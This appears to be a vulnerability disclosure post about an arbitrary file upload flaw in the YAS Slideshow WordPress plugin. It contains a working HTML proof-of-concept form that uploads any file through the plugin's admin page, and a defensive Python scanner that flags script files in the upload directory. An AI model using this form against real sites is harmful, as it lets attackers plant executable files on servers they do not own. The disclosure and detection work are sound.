07 Jun

Arbitrary File Upload Vulnerability in YAS Slideshow

The YAS Slideshow plugin has an arbitrary file upload vulnerability (as well as a persistent cross-site scripting (XSS) vulnerability and possibly other security issues) as of version 3.4. The details of the underlying issue that causes this can be found in our post for a vulnerability in the plugin Vertical Slideshow, which shares the same vulnerable code.

Proof of Concept

The following proof of concept will create a new category in the plugin, with the selected file as the Category Image. If there are no pre-existing categories, the uploaded file will be located in the directory /wp-content/uploads/yass/1_uploadfolder/big/.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<form action="http://[path to WordPress]/wp-admin/admin.php?page=yass_manage" method="POST" enctype="multipart/form-data">
<input type="hidden" name="task" value="yass_add_new_album" />
<input type="hidden" name="album_name" value="Arbitrary File Upload" />
<input type="hidden" name="album_desc" value="Arbitrary File Upload" />
<input type="file" name="album_img" value="" />
<input type="submit" value="Submit" />
</form>
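As an added defender-side check (this is not part of the original post or the plugin's code), the following Python script walks the plugin's upload directory, /wp-content/uploads/yass/, and flags files that either lack an image extension or carry an image extension but do not begin with JPEG, PNG or GIF magic bytes. The sample tree it builds is constructed for the demonstration; point find_suspicious_uploads at the real directory on a site you administer.

```python
import tempfile
from pathlib import Path

# Magic bytes of the image formats a slideshow "Category Image" is expected to be.
IMAGE_SIGNATURES = {
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}
IMAGE_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}


def image_type(header: bytes):
    """Return the image format implied by the leading bytes, or None if unrecognised."""
    for name, sigs in IMAGE_SIGNATURES.items():
        if any(header.startswith(s) for s in sigs):
            return name
    return None


def find_suspicious_uploads(upload_root):
    """Return (relative path, reason) for every file under upload_root that is not a plain image."""
    root = Path(upload_root)
    findings = []
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        with path.open("rb") as fh:
            header = fh.read(8)
        rel = path.relative_to(root).as_posix()
        ext = path.suffix.lower().lstrip(".")
        if ext not in IMAGE_EXTENSIONS:
            findings.append((rel, "non-image extension"))
        elif image_type(header) is None:
            findings.append((rel, "image extension but non-image content"))
    return findings


def build_sample_tree():
    """Constructed sample mirroring /wp-content/uploads/yass/1_uploadfolder/big/ (not real site data)."""
    root = Path(tempfile.mkdtemp()) / "yass" / "1_uploadfolder" / "big"
    root.mkdir(parents=True)
    (root / "banner.png").write_bytes(b"\x89PNG\r\n\x1a\n" + b"\x00" * 16)  # genuine image
    (root / "uploaded.php").write_bytes(b"<?php echo 1; ?>")                 # script placed via the upload
    (root / "photo.jpg").write_bytes(b"<?php echo 2; ?>")                    # script hidden behind an image extension
    return root.parent.parent  # the "yass" directory


if __name__ == "__main__":
    for rel, reason in find_suspicious_uploads(build_sample_tree()):
        print(f"{rel}: {reason}")
```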


  • 6/7/2016 – WordPress.org Plugin Directory notified.
